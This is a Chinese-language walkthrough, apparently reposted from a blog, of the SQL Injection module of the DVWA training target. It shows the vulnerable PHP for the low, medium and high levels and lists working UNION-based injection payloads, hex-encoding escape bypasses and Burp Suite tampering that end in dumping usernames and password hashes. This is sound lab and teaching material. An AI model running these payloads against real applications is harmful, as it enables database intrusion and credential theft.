本文為漏洞靶場DWVA第七個模塊SQL Injection詳細解答
low等級
代碼如下:
1 <?php 2 3 if( isset( $_REQUEST[ 'Submit' ] ) ) { 4 // Get input 5 $id = $_REQUEST[ 'id' ]; 6 7 // Check database 8 $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 9 $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); 10 11 // Get results 12 while( $row = mysqli_fetch_assoc( $result ) ) { 13 // Get values 14 $first = $row["first_name"]; 15 $last = $row["last_name"]; 16 17 // Feedback for end user 18 echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 19 } 20 21 mysqli_close($GLOBALS["___mysqli_ston"]); 22 } 23 24 ?>
如上圖,代碼并沒有對輸入進行過濾,存在sql注入漏洞
下面開始攻擊:
1.判斷是否存在注入
輸入 1 ---回傳正確
輸入 1’ ---回傳錯誤
輸入 1 and 1=1 ---回傳正確
輸入 1 and 1=2 ---回傳正確
輸入 1‘ and ’1‘=’1 ---回傳正確
輸入 1‘ and ’1‘=’1 ---回傳正確
輸入 1‘ and ’1‘=’2 ---回傳錯誤(到了這里得出應該存在字符型注入,下面繼續驗證)
輸入 1‘ or ’1‘=’1 ---回傳正確(回傳很多結果,證明存在字符型注入)
2.猜解查詢SQL陳述句中的欄位數
輸入 1‘ or 1=1 order by 1# ---回傳正確
輸入 1‘ or 1=1 order by 2# ---回傳正確
輸入 1‘ or 1=1 order by 3# ---回傳錯誤(回傳結果---Unknown column '3' in 'order clause' 證明欄位數為2)
3.確定欄位順序
輸入 1' or 1=1 union select 1,2# ---回傳兩組結果(證明執行的sql查詢陳述句為:select Frist name,Surname from 表 where ID='id')
4.確定資料庫
輸入 1' or 1=1 union select database(),2# ---確定資料庫為 dwva
5.猜解表名
輸入 1' or 1=1 union select 1,table_name from information_schema.tables where table_schema='dvwa' # ---確定表名為 guestbook 和 users
6.猜解列名
輸入 1' or 1=1 union select 1,column_name from information_schema.columns where table_schema='dvwa' and table_name='users' # ---爆出8個列名user_id,first_name,last_name,user,password,avatar,last_login,failed_login
7.猜解資料名
輸入 1' or 1=1 union select 1,concat(user,'-',password) from users # ---爆出所有資料
medium
代碼如下:
1 <?php 2 3 if( isset( $_POST[ 'Submit' ] ) ) { 4 // Get input 5 $id = $_POST[ 'id' ]; 6 7 $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); 8 9 $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 10 $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' ); 11 12 // Get results 13 while( $row = mysqli_fetch_assoc( $result ) ) { 14 // Display values 15 $first = $row["first_name"]; 16 $last = $row["last_name"]; 17 18 // Feedback for end user 19 echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 20 } 21 22 } 23 24 // This is used later on in the index.php page 25 // Setting it here so we can close the database connection in here like in the rest of the source scripts 26 $query = "SELECT COUNT(*) FROM users;"; 27 $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); 28 $number_of_rows = mysqli_fetch_row( $result )[0]; 29 30 mysqli_close($GLOBALS["___mysqli_ston"]); 31 ?>
中等難度中對特殊字符進行了轉義,并且將輸入框改為下拉選單,防止注入,
我們可以通過burpsuit抓包后修改提交資料來進行惡意注入,
下面開始攻擊:
1.判斷注入型別
選擇1,提交,抓包后更改為 (此操作后續簡寫為抓包)
1‘ and 1=1 ---回傳錯誤
1 and 1=1 ---回傳正常(說明注入型別為數字型注入)
2.判斷欄位數
抓包
1 order by 1# ---回傳正常
1 order by 2# ---回傳正常
1 order by 3# ---回傳錯誤(欄位數為2)
3.判斷欄位順序
抓包
1 union select 1,2# ---回傳正常
4.猜解資料庫
抓包
1 union select 1,database()# ---成功爆出資料庫 dvwa
5.猜解表名
抓包
1 union select 1,table_name from information_schema.tables where table_schema=‘dvwa’# ---回傳錯誤(此處的錯誤是由于存在字符 ‘ ,可以轉換成16進制然后提交)
1 union select 1,table_name from information_schema.tables where table_schema=0x276476776127# ---回傳正常(只能爆出admin表)
1 union select 1,table_name from information_schema.tables where table_schema=0x64767761# ---正常爆出(這里和上一句的區別在于轉換16進制的時候,上一句轉的是 ‘dvwa’ ,這一句轉的是 dvwa ,轉換的時候沒有加‘,需要注意!)
也可以這樣
1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() # ---爆出表名guestbook,users
6.猜解列名
抓包
1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 # ---爆出列名
7.猜解資料名
抓包
1 union select concat(user),concat(password) from users# ---爆出所有資料名
high
代碼如下:
1 <?php 2 3 if( isset( $_SESSION [ 'id' ] ) ) { 4 // Get input 5 $id = $_SESSION[ 'id' ]; 6 7 // Check database 8 $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; 9 $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' ); 10 11 // Get results 12 while( $row = mysqli_fetch_assoc( $result ) ) { 13 // Get values 14 $first = $row["first_name"]; 15 $last = $row["last_name"]; 16 17 // Feedback for end user 18 echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 19 } 20 21 ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); 22 } 23 24 ?>
high級別對提交引數加了一個 limit 1 ,依次來控制輸出引數為一個,
此處可以利用low中的注入破解,因為注入程序中用到了#,將后面的陳述句注釋掉了,
1.判斷注入型別
1' or '1'='1 ---字符注入
2.判斷欄位數
1' or 1=1 order by 2# ---回傳正確
1' or 1=1 order by 3# ---回傳錯誤
3.判斷欄位順序
1‘ or 1=1 union select 1.2# ---回傳正常
4.猜解資料庫
1‘ or 1=1 union select 1,database()# ---爆出資料庫名
5.猜解表名
1' or 1=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() # ---爆出表名
6.猜解列名
1' or 1=1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users' # ----爆出列名
7.爆出資料
1' or 1=1 union select group_concat(user),group_concat(password) from users # ---爆出資料
轉載請註明出處,本文鏈接:https://www.uj5u.com/shujuku/94419.html
標籤:MySQL
上一篇:MySQL資料篇 (一)存盤程序實作簡單的資料修改及事務的使用
下一篇:mysql常用命令